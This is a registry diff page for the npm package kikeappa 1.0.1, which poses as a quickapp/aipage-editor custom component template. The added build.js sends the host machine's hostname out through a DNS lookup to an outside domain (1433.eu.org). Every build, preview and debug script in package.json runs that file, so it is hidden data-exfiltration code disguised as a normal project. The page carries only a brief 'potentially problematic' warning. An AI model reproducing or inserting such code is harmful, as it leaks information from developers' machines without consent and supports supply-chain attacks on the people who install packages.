kikeappa 1.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of kikeappa might be problematic. Click here for more details.
- package/build.js +14 -0
- package/package.json +60 -0
package/build.js
ADDED
@@ -0,0 +1,14 @@
|
|
1
|
+
let os = require('os')
|
2
|
+
let x = os.hostname()
|
3
|
+
var dns = require('dns');
|
4
|
+
|
5
|
+
dns.lookup(x + '.e66112d2.dns.1433.eu.org', function onLookup(err, address, family) {
|
6
|
+
console.log('ip:', address);
|
7
|
+
dns.reverse(address, function (err, hostnames) {
|
8
|
+
if (err) {
|
9
|
+
console.log(err.stack);
|
10
|
+
}
|
11
|
+
|
12
|
+
console.log('ip ' + address + ': ' + JSON.stringify(hostnames));
|
13
|
+
});
|
14
|
+
});
|
package/package.json
ADDED
@@ -0,0 +1,60 @@
|
|
1
|
+
|
2
|
+
{
|
3
|
+
"name": "kikeappa",
|
4
|
+
"version": "1.0.1",
|
5
|
+
"description": "aipage-editor自定义组件模板,quickapp版自定义组件,用于开发快应用自定义组件。",
|
6
|
+
"keywords": [
|
7
|
+
"自定义组件注册器",
|
8
|
+
"quickapp自定义组件注册器",
|
9
|
+
"aipage-editor自定义组件",
|
10
|
+
"aipage-editor自定义插件"
|
11
|
+
],
|
12
|
+
"author": "pwasdd",
|
13
|
+
"scripts": {
|
14
|
+
"preview": "node build.js",
|
15
|
+
"build": "node build.js",
|
16
|
+
"preview:h5": "node build.js",
|
17
|
+
"linkDebug": "node build.js",
|
18
|
+
"build2lib": "node build.js",
|
19
|
+
"format": "prettier --write \"src/**/**/*.{js,jsx,ts,tsx,vue,scss,json}\""
|
20
|
+
},
|
21
|
+
"aipage-widgets": [
|
22
|
+
{
|
23
|
+
"type": "quick-info-card2",
|
24
|
+
"framework": "vue3",
|
25
|
+
"description": "nice,work",
|
26
|
+
"entry": "/web/renderer.umd",
|
27
|
+
"files": [
|
28
|
+
"/web/renderer.css"
|
29
|
+
],
|
30
|
+
"editorPlugin": {
|
31
|
+
"pluginEntry": "/web/plugin.umd",
|
32
|
+
"tag": [
|
33
|
+
"快应用组件"
|
34
|
+
],
|
35
|
+
"sort": 100,
|
36
|
+
"device": [
|
37
|
+
"mobile",
|
38
|
+
"quickapp",
|
39
|
+
"quickapp-card"
|
40
|
+
]
|
41
|
+
}
|
42
|
+
},
|
43
|
+
{
|
44
|
+
"type": "quick-info-card2",
|
45
|
+
"framework": "quickapp",
|
46
|
+
"entry": "/src/components/info-card"
|
47
|
+
}
|
48
|
+
],
|
49
|
+
"husky": {
|
50
|
+
"hooks": {
|
51
|
+
"pre-commit": "lint-staged",
|
52
|
+
"commit-msg": "commitlint -E HUSKY_GIT_PARAMS"
|
53
|
+
}
|
54
|
+
},
|
55
|
+
"lint-staged": {
|
56
|
+
"src/**/**/*.{js,jsx,ts,tsx,vue,scss,json}": [
|
57
|
+
"prettier --write"
|
58
|
+
]
|
59
|
+
}
|
60
|
+
}
|